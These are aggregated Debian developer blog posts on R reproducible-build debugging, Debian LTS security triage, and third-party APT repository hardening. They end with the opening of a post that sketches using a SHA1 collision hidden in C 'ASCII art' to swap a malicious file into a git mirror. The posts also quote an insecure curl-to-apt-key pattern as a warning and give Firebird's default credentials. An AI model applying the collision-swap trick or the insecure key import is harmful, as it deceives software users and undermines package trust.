After doing the same thing as before, i.e. grepping the R source code for "Enc" "timestamp" etc, we spot a few different places that are setting the wd field. Then after some experimenting, we find that overwriting this in a different file (src/library/tools/R/parseRd.R) seems to work to get rid of this irreproducibility. (This may not be the best; our exact strategy is still being discussed with upstream, but at least we know which areas of the code are responsible.) Exercise for the reader to figure out how to get rid of the paths.rds difference. After doing the previous two, this one is fairly easy. These three issues allowed us to write a preliminary patch that enabled us to reproduce r-cran-tensor.

$ ./r-mini-repro-test.sh r-cran-tensor-1.5 123
[..]
bca9de1351ab265475cf6f1af3f6aff49bde1d209e8fafb33954caa8d90f3462  ./debian/123/usr/lib/R/site-library/tensor/R/tensor.rdx
ac7fffeb751ffc2d13c5317704b19787a7078446d97d1c6f259c93f282e04cef  ./debian/123/usr/lib/R/site-library/tensor/R/tensor.rdb
d989603340d1e8f14c35551ef379956653bf3b6e7b1868b4bf9a66d85820998e  ./debian/123/usr/lib/R/site-library/tensor/help/tensor.rdx
30e543cda9f97c202dc9c0291933940dfe71b94d352f66d8ed6c035c1a722b41  ./debian/123/usr/lib/R/site-library/tensor/help/tensor.rdb
e9f78ba2cca39a6face1ed88fce4bb718d911d567d01db49bc00a3011720ac50  ./debian/123/usr/lib/R/site-library/tensor/help/paths.rds
$ ./r-mini-repro-test.sh r-cran-tensor-1.5 1234
[..]
bca9de1351ab265475cf6f1af3f6aff49bde1d209e8fafb33954caa8d90f3462  ./debian/1234/usr/lib/R/site-library/tensor/R/tensor.rdx
ac7fffeb751ffc2d13c5317704b19787a7078446d97d1c6f259c93f282e04cef  ./debian/1234/usr/lib/R/site-library/tensor/R/tensor.rdb
d989603340d1e8f14c35551ef379956653bf3b6e7b1868b4bf9a66d85820998e  ./debian/1234/usr/lib/R/site-library/tensor/help/tensor.rdx
30e543cda9f97c202dc9c0291933940dfe71b94d352f66d8ed6c035c1a722b41  ./debian/1234/usr/lib/R/site-library/tensor/help/tensor.rdb
e9f78ba2cca39a6face1ed88fce4bb718d911d567d01db49bc00a3011720ac50  ./debian/1234/usr/lib/R/site-library/tensor/help/paths.rds
$ ./r-mini-repro-test.sh r-cran-tensor 1234
[..]
bca9de1351ab265475cf6f1af3f6aff49bde1d209e8fafb33954caa8d90f3462  ./debian/1234/usr/lib/R/site-library/tensor/R/tensor.rdx
ac7fffeb751ffc2d13c5317704b19787a7078446d97d1c6f259c93f282e04cef  ./debian/1234/usr/lib/R/site-library/tensor/R/tensor.rdb
d989603340d1e8f14c35551ef379956653bf3b6e7b1868b4bf9a66d85820998e  ./debian/1234/usr/lib/R/site-library/tensor/help/tensor.rdx
30e543cda9f97c202dc9c0291933940dfe71b94d352f66d8ed6c035c1a722b41  ./debian/1234/usr/lib/R/site-library/tensor/help/tensor.rdb
e9f78ba2cca39a6face1ed88fce4bb718d911d567d01db49bc00a3011720ac50  ./debian/1234/usr/lib/R/site-library/tensor/help/paths.rds

Testing the patch Of course r-cran-tensor is just 1 package, so then we tested this patch on all 478 tagged R packages. Before the patch, all of these were unreproducible. Now 463/478 are reproducible, hurray! The first version of the patch made 2 packages FTBFS ("fail to build from source"), r-bioc-biobase and r-cran-shinybs; this was fixed in a subsequent version of the patch. (Some other packages, r-cran-randomfields r-cran-randomfieldsutils, FTBFS even with an unpatched r-base, due to differences between 3.3.3 and 3.4.0 (#861333), and not because of our patch.) Given the overwhelming proportion of packages that did reproduce, the other 14 packages that are still unreproducible, are quite probably due to issues in those specific packages. Only 2 of these are certainly due to build-path differences: r-cran-runit r-cran-rinside. This is because, we currently see they are reproducible in Debian testing but not Debian unstable. This is slightly misleading, the real reason is not testing vs unstable directly; rather the fact that we (at the time of writing) use the same build path when trying to reproduce Debian testing packages, and different paths for unstable. The other 12 are unreproducible in both testing and unstable, so it either suffers from a non-build-path issue as well as a build-path issue, or only a non-build-path issue. So, further investigation of each package is needed. This is where you can help.

Debugging R packages To investigate why (for example) r-cran-runit doesn't reproduce despite our patches, we just do the above process again:

$ DEBUG=1 ../r-mini-repro-test.sh r-cran-runit
[..]
>>> debug(tools:::makeLazyLoadDB)
>>> tools:::.install_packages()
processing  . 
a directory
* build_help_types=
* DBG: 'R CMD INSTALL' now doing do_install()
* created lock directory  /mystupidbuildpath/r-tests/r-cran-runit/debian/r-cran-runit/usr/lib/R/site-library/00LOCK-r-cran-runit 
* installing *source* package  RUnit  ...
** package  RUnit  successfully unpacked and MD5 sums checked
** backing up earlier installation
** R
** inst
** preparing package for lazy loading
debugging in: makeLazyLoadDB(ns, dbbase, compress = compress)
debug:  
[.. source code of makeLazyLoadDB ..]

We know our irreproducibility is with the help files and not the main package, so c to skip this part:

>>> c
exiting from: makeLazyLoadDB(ns, dbbase, compress = compress)
** help
debugging in: makeLazyLoadDB(db, file.path(manOutDir, basename(outDir)))
debug:  
[.. source code of makeLazyLoadDB ..]

Examine the "from" object, grep the output for our builddir

>>> from
$ RUnit-internal 
[..]
$ RUnit-intro 
[..]
[.. etc ..]
[..]
$checkFuncs
\title RUnit check [..]
[..]
  For a simple example see the provided test cases in
  /mystupidbuildpath/r-tests/r-cran-runit/debian/r-cran-runit/usr/lib/R/site-library/RUnit/examples/runitVirtualClassTest.r.
[..]

Found it, now we quit, patch the source code, and try again.

>>> Q
[..]
exit code 1
[.. hack hack hack ..]
$ ../r-mini-repro-test.sh r-cran-runit-0.4.31/ 123
[..]
01347305351a45bb88dab909c56942498e97f5edbe583cf6ab1327138914e315  ./debian/123/usr/lib/R/site-library/RUnit/R/RUnit.rdx
ecde40bdfac5b070acc30a0d5889d9d7f65418844d14312aceff6af5b9d0bf7a  ./debian/123/usr/lib/R/site-library/RUnit/R/RUnit.rdb
182d38ac5adc160eb9edd40d5bd7e27b95b756b8f14cee7d912ba4745ae81bdc  ./debian/123/usr/lib/R/site-library/RUnit/help/RUnit.rdx
f8a9f22acc9f937cb47a92f3979d619e83a791ad734796c2fcd9d0a34e1f11ca  ./debian/123/usr/lib/R/site-library/RUnit/help/RUnit.rdb
5c37672fdc1f325b8a3846f4eafd2624b246ec70ce01d197134fa1b97a9ee849  ./debian/123/usr/lib/R/site-library/RUnit/help/paths.rds
$ ../r-mini-repro-test.sh r-cran-runit-0.4.31/ 1234
[..]
01347305351a45bb88dab909c56942498e97f5edbe583cf6ab1327138914e315  ./debian/1234/usr/lib/R/site-library/RUnit/R/RUnit.rdx
ecde40bdfac5b070acc30a0d5889d9d7f65418844d14312aceff6af5b9d0bf7a  ./debian/1234/usr/lib/R/site-library/RUnit/R/RUnit.rdb
182d38ac5adc160eb9edd40d5bd7e27b95b756b8f14cee7d912ba4745ae81bdc  ./debian/1234/usr/lib/R/site-library/RUnit/help/RUnit.rdx
f8a9f22acc9f937cb47a92f3979d619e83a791ad734796c2fcd9d0a34e1f11ca  ./debian/1234/usr/lib/R/site-library/RUnit/help/RUnit.rdb
5c37672fdc1f325b8a3846f4eafd2624b246ec70ce01d197134fa1b97a9ee849  ./debian/1234/usr/lib/R/site-library/RUnit/help/paths.rds

Works! All finished.

If yours doesn't, just repeat the above loop; hopefully eventually you'll get there.

29 April 2017

Antoine Beaupr : My free software activities, April 2017

Debian Long Term Support (LTS) This is my monthly Debian LTS report. My time this month was spent working on various hairy security issues, most notably XBMC (now known as Kodi) and yaml-cpp.

Kodi directory transversal I started by looking in CVE-2017-5982, a "directory traversal" vulnerability in XBMC (now known as Kodi) which is a technical term for "allow attackers to read any world-readable file on your computer from the network". It's a serious vulnerability which has no known fix. When you enable the "remote control" interface in Kodi, it allows anyone with the password (which is disabled by default) to download any files Kodi has read access to on the machine it's running. Considering Kodi is often connected to multiple services, this may mean elevated compromise and more nasty stuff. I furthered the investigation done with my own analysis which showed the problem is difficult to solve: Kodi internally uses the facility to show thumbnails and media to the user, and there are no clear way of restricting which paths Kodi should have access to. Indeed, Kodi is designed to access mounted file systems and paths in arbitrary locations. In Debian bug #855225, I further confirmed confirmed wheezy and jessie-backports as vulnerable and therefore showed with good certainty that stretch and sid are vulnerable as well. I also suggested possible workaround, but at this point, it's in upstream's hands, as the changes will be intrusive. The file transfer mechanism need to be revamped all over Kodi, or authentication (with a proper password policy), need to be enforced.

Squirrelmail Next I looked at that old webmail software, Squirrelmail, which suffers from a remote code execution vulnerability (CVE-2017-7692) when sending mails with sendmail on the commandline. This is arguably an edge case, but considering the patch was simple, I figured I would provide an update to the LTS community. I tried to get a coordinated release for jessie, since the code is the same, but this wasn't completed at the time of writing. A patch is available and will hopefully be picked up by another LTS worker soon.

Fop and Batik Those issues (CVE-2017-5661 and CVE-2017-5662) were more difficult. The patches weren't clearly documented and there were no upstream references other than security advisories for the first release in years (in the case of batik) or months (in the case of fop), which made it hard to track down the issues. Fortunately, I was able to track down the upstream issues (FOP-2668 and BATIK-1139) where I got confirmation on what the proper fixes were. I could then release DLA-927-1 and DLA-926-1 with the backported patches. I do not use fop or batik. In fact, even after reading the homepage of both products, I couldn't quite figure out what use people could possibly have for that thing. Before uploading the packages, I therefore made packages available for testing for fop and batik.

libsndfile Next up was libsndfile which a bunch of overflows when parsing various audio files. I backported a patch for CVE-2017-7585 CVE-2017-7586 and CVE-2017-7741 which all seemed to be fixed by a single patch usptream. CVE-2017-7742 was also fixed, although with a separate patch. In all of those, i could only test CVE-2017-7741 and CVE-2017-7742, as the others were missing test cases. I provided a test package for a few days then I also figured it would be best to incorporate the security fixes done in stable, which brought in fixes for CVE-2015-7805, CVE-2014-9756 and CVE-2014-9496. So in the end, I ported patches from wheezy to jessie and uploaded the jessie version (reverting certain build changes) into wheezy and uploaded DLA-928-1 with the results.

yaml-cpp I then turned to yaml-cpp, a C++ parser for YAML. This one didn't have a known upstream fix, but I figured I would give it a shot anyways. I ended up writing my first C++ code in years which is still pending review and merge upstream. It's not an easy problem to fix: this is basically an excessive recursion problem that can be used to smash the stack. I figured I could introduce a recursion limit, but as the discussion showed, this is a limited approach: stack size varies on different platforms and it's not easy to find the right limit. The real solution is to rewrite the code to avoid recursion but that's a major code refactoring I didn't feel belong in a LTS update. Besides, this could be better handled by upstream, so I will leave things at that for now. It does make you wonder how much code out there is recursing on untrusted data structures...

kedpm Finally, a friend over at Koumbit.org reported Debian bug #860817, as information leak in kedpm, a password manager I previously maintained. I requested and got assigned CVE-2017-8296 and provided a fix for wheezy and jessie. For unstable and the coming stretch release, I have requested kedpm to be completely removed from Debian (Debian bug #860817) which involved a release notes update (Debian bug #861277). It's unfortunate to see software go, but kedpm wasn't maintained. I wasn't the original author: I just gave a few patches and ended up maintaining that software and not using it. It's a bad situation to be in, as you don't really know what's working and not with the tools you are supposed to be responsible for. There are more modern alternatives available now and I encourage everyone to switch.

Triage Looking for more work, I peeked a bit in the secretary tasks to triage some pending issues. I found that trafficserver could be crashed with simple requests (CVE-2017-5659) so I looked into that issue. My analysis showed that the patch is long and complex and could be difficult to backport to the old version available in wheezy. I also couldn't reproduce the issue in wheezy, so it may be a bug introduced only later, although I couldn't confirm that directly. I also triaged wireshark, where I just noted the maintainer expressed concern that we were taking up issues too fast and will probably take care of this one. I also postponed various issues in GnuTLS (marked "no-dsa") as they affect only a (unfortunately) rarely used part of GnuTLS that has been removed in later version: OpenPGP support.

Other free software work

Debiman I finally got around contributing to the debiman project. I worked on ensuring that there is a dman compatibility in debiman, by shipping dman in the debian-goodies package (Debian bug #860920). I also submitted a pull request to fix the fix about page title, document the custom assets repository, fix a stray bracket and link to the link to venerable man7.org project After a discussion on IRC, I also filed a few more issues:

redirect bpf to bpf.2, not bpf.4freebsd

redirect to unstable by default

arrows missing in table of contents

automatically collapse long links

old ?query= parameter ignored/failing

I'm happy to be able to contribute to this important service and I hope the new FAQ I created will be online soon!

XMonad and Emacs I started using writeroom-mode again as part of my work on LWN. As it turns out, my setup was not exactly working: I had to port my config to the new version and windows weren't "sticky" as they should be, a known issue with Xmonad. Indeed, Xmonad doesn't obey the "static" or "all desktops" standard directives. Writeroom is a "distraction-free writing" mode for Emacs, so the irony of working on such a deep distraction in establishing a distraction free environment is not lost on me. Needing to scratch that particular itch, and with the help of clever people from the IRC channel, I was able to make Emacs tell Xmonad to show its window (or "frame" as Emacs likes to call it) on all desktops. This involved creating a new function which I think could be useful in the CopyWindow library:

--   Toggle between "copyToAll" or "killAllOtherCopies". Copies to all
-- workspaces, or remove from all other workspaces, depending on
-- previous state (checked with "wsContainingCopies").
copyToAllToggle :: X ()
copyToAllToggle = do
    -- check which workspaces have copies
    copies <- wsContainingCopies
    if null copies
      then windows copyToAll -- no workspaces, make sticky
      else killAllOtherCopies -- already other workspaces, unstick

There are probably better ways of implementing this directly in the CopyWindow code - wsContainingCopies, in particular, is probably overkill. But it's all I can use directly from my xmonad.hs, so that's what I did. The other bit I needed was something to trigger that function from the outside. I rejected the ServerMode hook because it looked a bit too complicated and there is a built-in facility within X that works without this, which, from Emacs' point of view, is the x-send-client-message function. So I made up a new message identifier and wrote a event hook handler to process it:

--   handle X client messages that tell Xmonad to make a window appear
-- on all workspaces
--
-- this should really be using _NET_WM_STATE and
-- _NET_WM_STATE_STICKY. but that's more complicated: then we'd need
-- to inspect a window and figure out the current state and act
-- accordingly. I am not good enough with Xmonad to figure out that
-- part yet.
--
-- Instead, just check for the relevant message and check if the
-- focused window is already on all workspaces and toggle based on
-- that.
--
-- this is designed to interoperate with Emacs's writeroom-mode module
-- and called be called from elisp with:
--
-- (x-send-client-message nil 0 nil "XMONAD_COPY_ALL_SELF" 8 '(0))
myClientMessageEventHook :: Event -> X All
myClientMessageEventHook (ClientMessageEvent  ev_message_type = mt, ev_data = dt ) = do
  dpy <- asks display
  -- the client message we're expecting
  copyAllMsg <- io $ internAtom dpy "XMONAD_COPY_ALL_SELF" False
  -- if the event matches the message we expect, toggle sticky state
  when (mt == copyAllMsg && dt /= []) $ do
    copyToAllToggle
  -- we processed the event completely
  return $ All True

All that was left was to hook that into Emacs, and I was done! Whoohoo! Full screen total domination, distraction free work!

I would love to hear from others what they think of that approach, if they have improvements or if the above copyToAllToggle function could be merged in. Ideally, Xmonad would just parse the STICKY client messages and do the right thing - maybe even directly in CopyWindow - but I have found this enough Haskell for one day. You can see the diff on my home directory to see exactly the changes involved to make this configuration work.

Emacs packaging Speaking of Emacs, after complaining in the noisy `#emacs` IRC channel about the poor TLS configuration of marmelade.org -- and filing a bug (Debian bug #861106) regarding the use of SHA-1 in certificate pinning -- I was told we shouldn't expect trust from third-party ELPA repositories. Marmelade seems to be dead, as the maintainer is "behind the great firewall of China" and MELPA still hasn't figured out how to sign packages. In the end, it seems like there are tons of elpa packages in Debian and that if your favorite one is missing, that's a bug that can be filed and fixed. I first discovered that 6 of the packages I used were already packaged:

elpa-notmuch

elpa-ledger

elpa-use-package

elpa-markdown-mode

elpa-go-mode

elpa-anzu

And so I went ahead and filed a ton more bugs for the packages I am using but that aren't in Debian just yet:

company-go: Debian bug #861177

elpy: Debian bug #861174

markdown-toc: Debian bug #861128

multiple-cursors: Debian bug #861127

writegood-mode: Debian bug #861125

writeroom-mode: Debian bug #861124

Of those, I can't recommend multiple-cursors (MC) enough: I used it at least 4 times just writing this text. It's just awesome. The other ones are also all great in their own right of course, but I feel they are more specific to my workflow whereas MC is just amazing.

ikiwiki I did some more work on ikiwiki the software driving this blog. I created a new plugin to, at least, fix anchors in the table of contents to be human readable. This is something I had done on the MoinMoin wiki almost a decade ago -- which I called then NicerHeadingIds and that I have always found frustrating with Ikiwiki. It turns out the problem was both easier and hairier than I thought. Right from the start, something weird was happening: something was already adding nice headings, but they were somewhat broken. It turns out that multimarkdown already inserts those headers, but I wasn't satisfied with the way they were generated. But even worse, I had the headinganchors plugin enabled, but that plugin wasn't taking effect, because of multimarkdown. And even if it would take effect, it doesn't behave well with non-ASCII characters, which gets turned in their numeric presentation. So I also wrote the i18nheadinganchors plugin that creates better headings and patched the toc plugin so that it can reuse existing anchors if they exist, while keeping backwards compatibility. I hope this gets merged in a future ikiwiki release so I do not have to carry this patch locally too long... In other news, I have upgraded the ikiwiki-hosting package to the latest version and sent a patch upstream to provide HSTS support.

Other stuff I have migrated all my public repos hosted on my home server to either Gitlab.com or Github. I also have repositories on 0xacab and it seemed ludicrous to have 4 different, canonical, places where my code was hosted. I have now about 40 different projects on Gitlab and about 60 on Github, although most of the latter are forks of existing projects. I also made a manpage for stressant and moved the documentation to RTFD which makes it neatly accessible. I also made small incremental improvements (like `--directory` support). I installed Rainloop on this server to give a nice, mobile-friendly webmail. Instructions to replicate this setup are in mail. In the constant git-annex documentation effort, I tried to draft a user guide that could be a basis for restructuring the documentation to be more easily accessible. I also helped a friend put his documentation on the wiki in splitting a repository. Finally, I also looked into Android stuff a little more. I wrote a usability review of the F-Droid privileged extension that will bring good changes, I hope. I also opened the discussion regarding reproducible builds to try and clarify exactly how those worked to help the Wallabag people ship consistently signed alphas. So far, it seems that it will remain a standard practice on F-Droid to ship packages that are not signed by the official upstream signature, unfortunately, unless upstream provides a reproducible build that is publicly available... Switching to such build is also a hairy issue, as, obviously, the signature changes, which raises the alarm we are trying to avoid in the first place.

1 April 2017

Antoine Beaupr : My free software activities, February and March 2017

Looking into self-financing Before I begin, I should mention that I started tracking my time working on free software more systematically. I spend a lot of time on the computer, as regular readers of this blog might remember so I wanted to know exactly how much time was paid vs free work. I was already using org-mode's time clock system to keep track of my work hours, so I just extended this to my regular free software contributions, which also helps in writing those reports. It turns out that over 60% of my computer time is spent working on free software. That's huge! I was expecting something more along the range of 20 to 40% of my time. So I started thinking about ways of financing this work. I created a Patreon page but I'm hesitant into launching such a campaign: the only thing worse than "no patreon page" is "a patreon page with failed goals and no one financing it". So before starting such an effort, I'd like to get a feeling of what other people's experience with it are. I know that joeyh is close to achieving his goals, but I can't compare with the guy that invented git-annex or debhelper, so I'm concerned I wouldn't be able to raise the same level of funding. So any advice you have, feel free to contact me in private or in the comments. If you would be ready to fund my work, I'd love to know about it, obviously, but I guess I wouldn't get real numbers until I actually open up such a page... Now, onto the regular report.

Wallabako I spent a good chunk of time completing most of the things I had in mind for Wallabako, which I mentioned quickly in the previous report. Wallabako is now much easier to installed, with clearer instructions, an easier to use configuration file, more reliable synchronization and read status propagation. As usual the Wallabako README file has all the details. I've also looked at better integration with Koreader, the free software e-reader that forms the basis of the okreader free software distribution which has been able to port Debian to the Kobo e-readers, a project I am really excited about. This project has the potential of supporting Kobo readers beyond the lifetime that upstream grants it and removes a lot of proprietary software and spyware that ships with the Kobo readers. So I have made a few contributions to okreader and also on koreader, the ebook reader okreader is based on.

Stressant I rewrote stressant, my simple burn-in and stress-testing tool. After struggling in turn with Debirf, live-build, vmdebootstrap and even FAI, I just figured maybe it wasn't the best idea to try and reinvent that particular wheel: instead of reinventing how to build yet another Debian system build tool, maybe I should just reuse what's already there. It turns out there's a well known, succesful and fairly complete recovery system called Grml. It is a Debian Derivative, so all I needed to do was to stop procrastinating and actually write the actual stressant tool instead of just creating a distribution with a bunch of random tools shipped in. This allowed me to focus on which tools were the best to stress test different components. This selection ended up being:

lshw and smartmon-tools (smartctl) for hardware inventory
coreutils's famous dd, hdparm, fio and (again) smartctl) for disk testing
stress-ng for CPU testing
iperf3 for network testing

fio can also be used to overwrite disk drives with the proper options (--overwrite and --size=100%), although grml also ships with nwipe for wiping old spinning disks and hdparm to do a secure erase of SSD disks (whatever that's worth). Stressant still needs to be shipped with grml for this transition to be complete. In the meantime, I was able to configure the excellent public Gitlab CI service to provide ISO images with Stressant built-in as a stopgap measure. I also need to figure out a way to automate starting stressant from a boot menu to automate deployments on a larger scale, although because I have little need for the feature at this moment in time, this will likely wait for a sponsor to show up for this to be implemented. Still, stressant has useful features like the capability of sending logs by email using a fresh new implementation of the Python SMTPHandler (BufferedSMTPHandler) which waits for logging to complete before sending a single email. Another interesting piece of code in there is the NegateAction argparse handler that enables the use of "toggle flags" (e.g.

--flag /
--no-flag

). I'm so happy with the code that I figure I could just share it here directly:

class NegateAction(argparse.Action):
    '''add a toggle flag to argparse

    this is similar to 'store_true' or 'store_false', but allows
    arguments prefixed with --no to disable the default. the default
    is set depending on the first argument - if it starts with the
    negative form (define by default as '--no'), the default is False,
    otherwise True.
    '''
    negative = '--no'
    def __init__(self, option_strings, *args, **kwargs):
        '''set default depending on the first argument'''
        default = not option_strings[0].startswith(self.negative)
        super(NegateAction, self).__init__(option_strings, *args,
                                           default=default, nargs=0, **kwargs)
    def __call__(self, parser, ns, values, option):
        '''set the truth value depending on whether
        it starts with the negative form'''
        setattr(ns, self.dest, not option.startswith(self.negative))

Short and sweet. I wonder why stuff like this is not in the standard library yet - maybe just because no one bothered yet? It'd be great to get feedback of more experienced Pythonistas on this one. I hope that my work on Stressant is complete. I get zero funding for this work, and have little use for it myself: I manage only a few machines and such a tool really shines when you regularly put new hardware online, which is (fortunately?) not my case anymore. I'd be happy, of course, to accompany organisations and people that wish to further develop and use such a tool. A short demo of stressant as well as detailed description of how it works is of course available in its README file.

Standard third party repositories After looking at improvements for the grml repository instructions, I realized there was no real "best practices" document on how to configure an Apt repository. Sure, there are tools like reprepro and others, but those hardly qualify as policy: they are very flexible and there are lots of ways to create insecure repositories or curl sh style instructions, which we of course generally want to avoid. While the larger problem of Unstrusted Debian packages remain generally unsolved (e.g. when you install any .deb file, it can get root on your system), it seemed to me one critical part of this problem was how to add a random third-party repository to your machine while limiting, as much as possible, what possible attackers could do with such a repository. In other words, to solve the more general problem of insecure .deb files, we also need to solve the distribution problem, otherwise fixing the .deb files themselves will be useless. This lead to the creation of standardized repository instructions that define:

how to distribute the repository's public signing key (ie. over HTTPS)
how to name suites and components (e.g. use stable and main unless you have a good reason, and explain yourself)
recommend a healthy does of apt preferences pinning
how to distribute keys (e.g. with a derive-archive-keyring package)

I've seen so many third party repositories get this wrong. For example, a lot of repositories recommend this type of command to intialize the OpenPGP trust path:

curl http://example.com/key.asc   apt-key add -

This has the following problems:

the key is transfered in plaintext and can easily be manipulated by an active attacker (e.g. a router on your path to the server or a neighbor in a Wifi cafe)
the key is added to the main trust root, which allows the key to authentify as the real Debian archive, therefore giving it all rights over all packages
since it's part of the global archive, it's difficult for a package to remove/add the key when a key rollover is necessary (and repositories generally don't provide a deriv-archive-keyring to do that process anyways)

An example of this are the Docker install instructions that, at least, manage to do this over HTTPS. Some other repositories don't even bother teaching people about the proper way of adding those keys. We settled for:

wget -O /usr/share/keyrings/deriv-archive-keyring.gpg https://deriv.example.net/debian/deriv-archive-keyring.gpg

That location was explicitly chosen to be out of the main trust directory, so that it needs to be explicitly added to the sources.list as well:

deb [signed-by=/usr/share/keyrings/deriv-archive-keyring.gpg] https://deriv.example.net/debian/ stable main

Similarly, we highly recommend users setup "apt pinning" to restrict what a given repository can do. Since pinning is so confusing, most people don't actually bother even configuring it and I have yet to see a single repo advise its users to configure those preferences, which are essential to limit what a repository can do. To keep configuration simple, we recommend this:

Package: *
Pin: origin deriv.example.net
Pin-Priority: 100

Obviously, for a single-package repository, the actual package name should be listed, e.g.:

Package: foo
Pin: origin deriv.example.net
Pin-Priority: 100

And the priority should probably be set to 1 unless you want to allow automatic upgrades. It is my hope that this design will get more traction in the years to come and become a de-facto standard that will be a key part in safely adding third party repositories. There is obviously much more work to be done to improve security when installing untrusted .deb files, and I encourage Debian developers to consider contributing to the UntrustedDebs discussions and particularly to the Teams/Dpkg/Spec/DeclarativePackaging work.

Signal R&D I spent a significant amount of time this month struggling with the Signal project on my phone. I'm still ambivalent on Signal: it's a centralized designed, too dependent on phone numbers, but I must admit they get a lot of things right and it's the only free-software platform that allows for easy-to-use, multi-platform videoconferencing that my family can use. I've been following Signal for a while: up until now, I had been using the LibreSignal rebuild of the official client, as it is distributed on a F-Droid repository. Because I try to avoid Google (proprietary) software on my phone, it's basically the only way I could even install Signal. Unfortunately, the repository is out of date and introduces another point of trust in the distribution model: now you not only need to trust the Signal authors to do the right thing, you also need to trust that F-Droid repo not to inject nasty code on your phone. I've therefore started a discussion about how Signal could be distributed outside of the Google Play Store. I'd like to think it's one of the things that led the Signal people to distribute an official copy of Signal outside of the playstore. After much struggling, I was able to upgrade to this official client and will be able to upgrade easily by just downloading the APK. (Do note that I ended up reinstalling and re-registering Signal, which unfortunately changed my secret keys.) I do hope Signal enters F-Droid one day, but it could take a while because it still doesn't work without Google services and barely works with MicroG, the free software alternative to the Google services clients. Moxie also set a list of requirements like crash reporting and statistics that need to be implemented on F-Droid's side before he agrees to the deployment, so this could take a while. I've also participated in the, ahem, discussion on the JWZ blog regarding a supposed vulnerability in Signal where it would leak previously unknown phone numbers to third parties. I reviewed the way the phone number is uploaded and, while it's possible to create a rainbow table of phone numbers (which are hashed with a truncated SHA-1 checksum), I couldn't verify the claims of other participants in the thread. For me, Signal still does the right thing with contacts, although I do question the way "read status" notifications get transmitted, but that belong in another bug report / blog post.

Debian Long Term Support (LTS) It's been more than a year working on Debian LTS, started by Raphael Hertzog at Freexian. I didn't work much in February so I had a lot of hours to catchup with, and was unfortunately unable to do so, partly because I was busy with other projects, and partly because my colleagues are doing a great job at resolving the most important issues. So one my concerns this month was finding work. It seemed that all the hard packages were either taken (e.g. my usual favorites, tiff and imagemagick, we done by others) or just too challenging (e.g. I don't feel quite comfortable tackling the LTS branch of the Linux kernel yet). I spent quite a bit of time trying to figure out what was wrong with pcre3, only to realise the "32" in the report was not about the architecture, but about the character width. Because of thise, I marked 4 CVEs (CVE-2017-7186, CVE-2017-7244, CVE-2017-7245, CVE-2017-7246) as "not-affected", since the 32-bith character support wasn't enabled in wheezy (or jessie, for that matter). I still spent some time trying to reproduce the issues, which require a compiler with an AddressSanitizer, something that was introduced in both Clang and GCC after Wheezy was released, which makes reproducing this fairly complicated... This allowed me to experiment more with Vagrant, however, and I have provided the Debian cloud team with a 32-bit Vagrant box that was merged in shortly after, although it doesn't show up yet in the official list of Debian images. Then I looked at the apparmor situation (CVE-2017-6507), Debian bug #858768). That was one tricky bug as well, since it's not a security issue in apparmor per se, but more an issue with things that assume a certain behavior from apparmor. I have concluded that Wheezy was not affected because there are no assumptions of proper isolation there - which are provided only starting from LXC 1.0 - and Docker is not in Wheezy. I also couldn't reproduce the issue on Jessie, but, as it turns out, the issue was sysvinit-specific, which is why I couldn't reproduce it under the default systemd configuration shipped with Jessie. I also looked at the various binutils security issues: as I reported on the mailing list, I didn't see anything serious enough in there to warrant a a security release and followed the lead of both the stable and Red Hat security teams by marking this "no-dsa". I similiarly reviewed the mp3splt security issues (specifically CVE-2017-5666) and was fairly puzzled by that issue, which seems to be triggered only the same address sanitization extensions than PCRE, although there was some pretty wild interplay with debugging flags in there. All in all, it seems we can't reproduce that issue in wheezy, but I do not feel confident enough in the results to push that issue aside for now. I finally uploaded the pending graphicsmagick issue (DLA-547-2), a regression update to fix a crash that was introduced in the previous release (DLA-547-1, mistakenly named DLA-574-1). Hopefully that release should clear up some of the confusion and fix the regression. I also released DLA-879-1 for the CVE-2017-6369 in firebird2.5 which was an interesting experiment: I couldn't reproduce the issue in a local VM. After following the Ubuntu setup tutorial, as I wasn't too familiar with the Firebird database until now (hint: the default username and password is `sysdba`/`masterkey`), I ended up assuming we were vulnerable and just backporting the patch after seeing the jessie folks push out a release just in case. I also looked at updating the ca-certificates package to deal with the pending WoSign/Startcom removal: I made an explicit list of the CAs that need to be removed after reviewing the Mozilla list. I also sent a patch for an unrelated issue where ca-certificates is writing to `/usr/local` (!!) in Debian bug #843722. I have also done some "meta" work in starting a discussion about fixing the missing DLA links in the tracker, as you will notice all of the above links lead to nowhere. Thanks to pabs, there are now some links but unfortunately there are about 500 DLAs missing from the website. We also discussed ways to Debian bug #859123, something which is currently a manual process. This is now in the hands of the excellent webmaster team. I have also filed a few missing security bugs (Debian bug #859135, Debian bug #859136), partly because I wanted to help the security team. But it turned out that I felt the script needed some improvements, so I submitted a patch to improve the script so it is easier to run.

Other projects As usual, there's the usual mixed bags of chaos:

converted the Charybdis IRC operator guide from SGML (yuck) to RST (PR)

patches and discussions on the restic backup software review and backup data generation program in the hope of reducing duplication with the other two similar projects (Obnam's genbackupdata and Borg's backupdata)

atheme-services security upload (still need to do the same with charybdis

neat cleanup of the Python Cryptography table of contents (PR)

basic maintenance on the Linkchecker project, including particularly a set of community guidelines which I'd like to standardize as well

raised a red flag on the security of the Weechat project by reporting that most users are not aware that Weechat relays provide arbitrary remote code execution to clients, upstream thinks users are to blame, issue still opened

git-annex documentation: semi-synchronized remotes and antipatterns

tried to unblock the mess that TLS verification still is in Emacs (Debian bug #816063)

More stuff on Github...

24 February 2017

Joey Hess: SHA1 collision via ASCII art

Happy SHA1 collision day everybody! If you extract the differences between the good.pdf and bad.pdf attached to the paper, you'll find it all comes down to a small ~128 byte chunk of random-looking binary data that varies between the files. The SHA1 attack announced today is a common-prefix attack. The common prefix that we will use is this:

/* ASCII art for easter egg. */
char *amazing_ascii_art="\

(To be extra sneaky, you can add a git blob object header to that prefix before calculating the collisions. Doing so will make the SHA1 that git generates when checking in the colliding file be the thing that collides. This makes it easier to swap in the bad file later on, because you can publish a git repository containing it, and trick people into using that repository. ("I put a mirror on github!") The developers of the program will have the good version in their repositories and not notice that users are getting the bad version.) Suppose that the attack was able to find collisions using only printable ASCII characters when calculating those chunks. The "good" data chunk might then look like this:

7*yLN#!NOKj@ FPKW".<i+sOCsx9QiFO0UR3ES*Eh]g6r/anP=bZ6&IJ#cOS.w;oJkVW"<*.!,qjRht?+^=^/Q*Is0K>6F)fc(ZS5cO#"aEavPLI[oI(kF_l!V6ycArQ

And the "bad" data chunk like this:

9xiV^Ksn=<A!<^ l4~ uY2x8krnY@JA<<FA0Z+Fw!;UqC(1_ZA^fu#e Z>w_/S?.5q^!WY7VE>gXl.M@d6]a*jW1eY(Qw(r5(rW8G)?Bt3UT4fas5nphxWPFFLXxS/xh

